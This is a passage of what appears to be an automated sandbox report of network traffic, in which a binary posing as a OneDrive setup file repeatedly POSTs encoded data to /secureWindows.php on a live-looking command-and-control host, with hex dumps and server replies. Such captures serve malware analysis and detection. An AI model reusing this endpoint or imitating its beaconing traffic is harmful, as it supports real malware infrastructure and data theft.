                                                        Data Ascii: W_\]UTV\XWPYUP[ST\\XYWZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&8 =(238,&0%.?; 7[&7(5$(&:* F$,Z*
                                                        Oct 30, 2024 05:23:03.343373060 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:03.642236948 CET | 785 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rr55i%2BlhArEZ%2BrVgTgtD4s9YSHlgcU4GgrHtMAdZPqHqTwDq%2F28aU5V2dlLDlvAFNL2Y7QhOcEWBWNZyOUjCbnFLq3ko2vCvvUF%2B0hsvP%2FqLNMW0o6GH70ppkOygKpXnB43bzhbTsw4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0b57c5f3171-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1472&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1067059&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:03.642267942 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        66 | 192.168.2.4 | 49834 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:03.789321899 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:04.149643898 CET | 1076 | OUT | Data Raw: 52 55 5c 50 50 58 53 57 58 57 50 59 55 5e 5b 5f 54 5b 5c 54 59 50 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RU\PPXSWXWPYU^[_T[\TYPZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\8#2Y+"Y0=+C950_2[,X,44#Z2*<<&)'+&. F$,Z*=
                                                        Oct 30, 2024 05:23:04.384022951 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:04.736706972 CET | 792 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iTXpV%2FSWMEoQYM%2FxD0%2B1DRNVU0N99DBJoU8NGeGbCICmYspmwVbuQPrMG%2Fzy20xCVulIqCFqHt4K4xEsRCMfzyy6h2V7ijf35kOMzWiBRd6mgu6P%2BjkKf7Fltj%2FGYI7wT3MQPRU888g%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0bc0f206bf6-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1048&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1423795&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        67 | 192.168.2.4 | 49840 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:04.865916967 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:05.215023041 CET | 1076 | OUT | Data Raw: 57 53 5c 57 55 55 56 55 58 57 50 59 55 5a 5b 58 54 53 5c 58 59 53 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\WUUVUXWPYUZ[XTS\XYSZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z/9<81$<.$%=?, \#$&)6*38):: F$,Z*-
                                                        Oct 30, 2024 05:23:05.463927031 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:05.779983044 CET | 782 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ee4hrKMMhjWkU2ANukxqQNnpIlH4%2Bu53kpyJDnx9O8zBcU9YxnLIFynPenZ4h2y77qmVQHhHI1iyXXnvTR9cxLOsw%2BFBPMRHo5iQdP1uu%2B9iGAKsCeNTPpGU4DTkr8YslxBo%2B3yG4W0%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0c2caf83160-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2237&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=643555&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:05.780004978 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        68 | 192.168.2.4 | 49846 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:05.911597013 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:06.261605978 CET | 1072 | OUT | Data Raw: 57 50 59 55 55 5a 56 56 58 57 50 59 55 58 5b 58 54 5d 5c 5a 59 56 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WPYUUZVVXWPYUX[XT]\ZYVZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&8 :Y?2]'>;9%>0Z8:$\4Z&9??=$X/: F$,Z*-
                                                        Oct 30, 2024 05:23:06.538000107 CET | 25 | IN | HTTP/1.1 100 Continue


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        69 | 192.168.2.4 | 49852 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:06.706988096 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:07.058449984 CET | 1340 | OUT | Data Raw: 57 51 5c 5c 50 5d 56 56 58 57 50 59 55 5b 5b 59 54 53 5c 59 59 55 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQ\\P]VVXWPYU[[YTS\YYUZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\/*X+!3=C95 \2=+-*[4\27]?C=3- F$,Z*)
                                                        Oct 30, 2024 05:23:07.305577040 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:07.516115904 CET | 935 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2FzVUv%2BRrUmIanJii2KWpX1RBWZ2vxK7Oso9aHzE72Jwtz6Ix%2Bj3AD0xSRY45u4AXysB65GojdklUgVSFFtDBWANyAeYvPz1l71nWopKNfPqHMsMnbAlNUu3bhKphdipR6vyVPZQm6U%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0ce48a5e843-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1548&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1194719&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 57 3c 28 27 0f 32 0d 00 58 3c 2f 32 00 28 3e 3e 15 24 1f 02 14 25 12 3a 5f 2a 38 30 00 3d 0a 34 1d 2b 1c 2c 5c 37 36 2f 00 3e 2b 2f 46 0c 10 24 00 27 31 2f 52 2b 0a 25 1f 2a 16 0d 1a 20 20 0f 04 28 29 2b 51 21 1d 37 07 33 32 2a 53 38 3e 2e 52 2e 25 0c 5a 39 0d 3c 52 3e 3a 21 57 08 14 21 03 25 5a 3b 1b 32 2e 24 14 32 32 25 07 37 2c 3b 5c 21 38 22 13 28 02 37 0b 32 09 23 03 24 55 37 52 26 39 3c 5b 3e 31 3c 0c 32 19 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&W<('2X</2(>>$%:_*80=4+,\76/>+/F$'1/R+%* ()+Q!732*S8>.R.%Z9<R>:!W!%Z;2.$22%7,;\!8"(72#$U7R&9<[>1<2"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        70 | 192.168.2.4 | 49853 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:06.828289986 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:07.183403969 CET | 1076 | OUT | Data Raw: 52 52 5c 56 55 55 53 52 58 57 50 59 55 51 5b 59 54 5d 5c 5f 59 50 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RR\VUUSRXWPYUQ[YT]\_YPZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_;1+>3=(-67%=0_,: '\&0<%&89: F$,Z*
                                                        Oct 30, 2024 05:23:07.454967976 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:07.656579971 CET | 792 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BAqPkIKn6D4f%2BvlFHVxdr1Ou0ciTLVndxTuvnwOmPdzgcpjRcgYd1jyeBSzCvLRQ6ijSZBwo%2FhSMUHs8t%2FfOLdxBHKt1%2FVevo5CBLggUBiujav7enI%2Bu7enCJFu9WVa2xm0BBNaq%2Bds%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0cf397e6bd4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1189&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1310407&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        71 | 192.168.2.4 | 49859 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:07.781783104 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:08.136507034 CET | 1076 | OUT | Data Raw: 52 50 59 50 55 59 56 55 58 57 50 59 55 50 5b 5a 54 52 5c 5d 59 5d 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RPYPUYVUXWPYUP[ZTR\]Y]Z[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[8 "X+'/D:%]%>?;97"*7Z')#+"$;%- F$,Z*
                                                        Oct 30, 2024 05:23:08.382311106 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:08.702347040 CET | 782 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J3v%2FnZc%2B7JnhHDwIZtX%2B9vED7YKKTIC0EB0tolF0MLScyqkd9qpEMO5946mPwlhwV%2BpoNZWerawkBioW1LZIbITGc9XFcfbmCYGfs70XR4E1pR1d3pVAYgmojudAkvcH8OgLqRnRkgY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0d508b835a0-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=992&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1511482&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:08.702375889 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        72 | 192.168.2.4 | 49865 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:08.825757027 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:09.183337927 CET | 1076 | OUT | Data Raw: 52 54 5c 51 55 54 56 54 58 57 50 59 55 5c 5b 59 54 53 5c 5e 59 56 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\QUTVTXWPYU\[YTS\^YVZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/.?'>#@.&32[$_/:<X#2?^(C5[0:- F$,Z*5
                                                        Oct 30, 2024 05:23:09.423645973 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:09.620367050 CET | 802 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GqWIxoKCC%2BmCn4nGIpVJ%2FQbUSk1afavcFKl%2Bcf0u7Q1f%2Bl9o%2B%2BdBys1MwgL%2FqwZEukN5%2FKzzsBb0mCNcjdZF7%2BNrA4uopHxxoVys4MmAUXDpQsBGCkDdIcb9j7ylcStIuJvTH%2FF%2B2C8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0db8fcf4769-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1123&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1375118&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        73 | 192.168.2.4 | 49873 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:09.753035069 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:10.105279922 CET | 1076 | OUT | Data Raw: 57 55 5c 56 55 55 53 57 58 57 50 59 55 5e 5b 59 54 5e 5c 54 59 5c 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WU\VUUSWXWPYU^[YT^\TY\ZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%8#2=(\'<-6#&;87 %90(6!Z3+). F$,Z*=
                                                        Oct 30, 2024 05:23:10.348525047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:10.557111025 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZqN2pqNr9Eczn7uVZAUZ3Dl05x15oc7wDkciiNGhPEerBSxtm%2FraQtBteVE0MiS5gAbxn%2FPNYXN18wkfPsWT1gquJjaLAz9hAAefly8oye5Pga%2FvJXFJ6SZgdBUmTYsIliQuL%2F6WfE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0e15cf76c7c-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1074&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1399033&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        74 | 192.168.2.4 | 49881 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:10.693362951 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:11.042876005 CET | 1076 | OUT | Data Raw: 57 53 5c 56 55 5d 56 5c 58 57 50 59 55 59 5b 59 54 5a 5c 5d 59 51 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\VU]V\XWPYUY[YTZ\]YQZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,:?^10;9%3%[/;? 72+Y<5>'-Z9: F$,Z*!
                                                        Oct 30, 2024 05:23:11.275542974 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:11.467158079 CET | 786 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5EfnLAJEfOgY1GRc6triPMTEIs%2FiLn5mDesuocrhlrolBfhyA3YfYAz7OWeCSpqxNVIIOQoU1HdPIY7zQQfZw5s0YuIv8z6ws4%2FHNcBH7G8PWYBUxepb9TBvGVzmu5xTxvRr%2Bs3M0CQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0e72d344786-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1191&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1123351&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        75 | 192.168.2.4 | 49887 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
